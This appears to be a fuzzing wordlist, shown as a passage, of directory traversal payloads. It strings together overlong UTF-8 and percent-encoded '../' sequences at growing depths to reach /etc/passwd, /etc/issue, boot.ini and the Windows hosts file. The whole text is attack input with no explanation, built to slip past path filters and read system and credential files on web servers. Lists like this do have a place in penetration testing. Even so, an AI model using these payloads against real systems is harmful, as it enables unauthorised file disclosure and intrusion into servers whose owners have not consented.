-%c0%5e%c0%5e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cetc%25c1%259cpasswd -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cetc%25c1%259cissue -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cboot.ini -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cetc%25c1%259cpasswd -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cetc%25c1%259cissue -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cboot.ini -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cetc%25c1%259cpasswd -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cetc%25c1%259cissue -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cboot.ini -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cetc%25c1%259cpasswd -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cetc%25c1%259cissue -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cboot.ini -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cetc%25c1%259cpasswd -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cetc%25c1%259cissue -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cboot.ini -%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259c%c0%5e%c0%5e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%5e%c0%5e%25c0%25afetc%25c0%25afpasswd -%c0%5e%c0%5e%25c0%25afetc%25c0%25afissue -%c0%5e%c0%5e%25c0%25afboot.ini -%c0%5e%c0%5e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afetc%25c0%25afpasswd -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afetc%25c0%25afissue -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afboot.ini -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afetc%25c0%25afpasswd -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afetc%25c0%25afissue -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afboot.ini -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afetc%25c0%25afpasswd -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afetc%25c0%25afissue -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afboot.ini -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afetc%25c0%25afpasswd -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afetc%25c0%25afissue -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afboot.ini -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afetc%25c0%25afpasswd -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afetc%25c0%25afissue -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afboot.ini -%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25af%c0%5e%c0%5e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%5e%c0%5e%f0%80%80%afetc%f0%80%80%afpasswd -%c0%5e%c0%5e%f0%80%80%afetc%f0%80%80%afissue -%c0%5e%c0%5e%f0%80%80%afboot.ini -%c0%5e%c0%5e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afetc%f0%80%80%afpasswd -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afetc%f0%80%80%afissue -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afboot.ini -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afetc%f0%80%80%afpasswd -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afetc%f0%80%80%afissue -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afboot.ini -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afetc%f0%80%80%afpasswd -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afetc%f0%80%80%afissue -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afboot.ini -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afetc%f0%80%80%afpasswd -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afetc%f0%80%80%afissue -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afboot.ini -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afetc%f0%80%80%afpasswd -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afetc%f0%80%80%afissue -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afboot.ini -%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%af%c0%5e%c0%5e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%5e%c0%5e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%5e%c0%5e%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%5e%c0%5e%f8%80%80%80%afboot.ini -%c0%5e%c0%5e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afboot.ini -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afboot.ini -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afboot.ini -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afboot.ini -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afboot.ini -%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%af%c0%5e%c0%5e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%ee%c0%ee/etc/passwd -%c0%ee%c0%ee/etc/issue -%c0%ee%c0%ee/boot.ini -%c0%ee%c0%ee/windows/system32/drivers/etc/hosts -%c0%ee%c0%ee/%c0%ee%c0%ee/etc/passwd -%c0%ee%c0%ee/%c0%ee%c0%ee/etc/issue -%c0%ee%c0%ee/%c0%ee%c0%ee/boot.ini -%c0%ee%c0%ee/%c0%ee%c0%ee/windows/system32/drivers/etc/hosts -%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/etc/passwd -%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/etc/issue -%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/boot.ini -%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/windows/system32/drivers/etc/hosts -%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/etc/passwd -%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/etc/issue -%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/boot.ini -%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/windows/system32/drivers/etc/hosts -%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/etc/passwd -%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/etc/issue -%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/boot.ini -%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/windows/system32/drivers/etc/hosts -%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/etc/passwd -%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/etc/issue -%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/boot.ini -%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/%c0%ee%c0%ee/windows/system32/drivers/etc/hosts -%c0%ee%c0%ee\etc\passwd -%c0%ee%c0%ee\etc\issue -%c0%ee%c0%ee\boot.ini -%c0%ee%c0%ee\windows\system32\drivers\etc\hosts -%c0%ee%c0%ee\%c0%ee%c0%ee\etc\passwd -%c0%ee%c0%ee\%c0%ee%c0%ee\etc\issue -%c0%ee%c0%ee\%c0%ee%c0%ee\boot.ini -%c0%ee%c0%ee\%c0%ee%c0%ee\windows\system32\drivers\etc\hosts -%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\etc\passwd -%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\etc\issue -%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\boot.ini -%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\windows\system32\drivers\etc\hosts -%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\etc\passwd -%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\etc\issue -%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\boot.ini -%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\windows\system32\drivers\etc\hosts -%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\etc\passwd -%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\etc\issue -%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\boot.ini -%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\windows\system32\drivers\etc\hosts -%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\etc\passwd -%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\etc\issue -%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\boot.ini -%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\%c0%ee%c0%ee\windows\system32\drivers\etc\hosts -%c0%ee%c0%ee%2fetc%2fpasswd -%c0%ee%c0%ee%2fetc%2fissue -%c0%ee%c0%ee%2fboot.ini -%c0%ee%c0%ee%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fetc%2fpasswd -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fetc%2fissue -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fboot.ini -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fetc%2fpasswd -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fetc%2fissue -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fboot.ini -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fetc%2fpasswd -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fetc%2fissue -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fboot.ini -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fetc%2fpasswd -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fetc%2fissue -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fboot.ini -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fetc%2fpasswd -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fetc%2fissue -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fboot.ini -%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2f%c0%ee%c0%ee%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%ee%c0%ee%5cetc%5cpasswd -%c0%ee%c0%ee%5cetc%5cissue -%c0%ee%c0%ee%5cboot.ini -%c0%ee%c0%ee%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cetc%5cpasswd -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cetc%5cissue -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cboot.ini -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cetc%5cpasswd -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cetc%5cissue -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cboot.ini -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cetc%5cpasswd -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cetc%5cissue -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cboot.ini -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cetc%5cpasswd -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cetc%5cissue -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cboot.ini -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cetc%5cpasswd -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cetc%5cissue -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cboot.ini -%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5c%c0%ee%c0%ee%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%ee%c0%ee0x2fetc0x2fpasswd -%c0%ee%c0%ee0x2fetc0x2fissue -%c0%ee%c0%ee0x2fboot.ini -%c0%ee%c0%ee0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fetc0x2fpasswd -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fetc0x2fissue -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fboot.ini -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2f%c0%ee%c0%ee0x2fetc0x2fpasswd 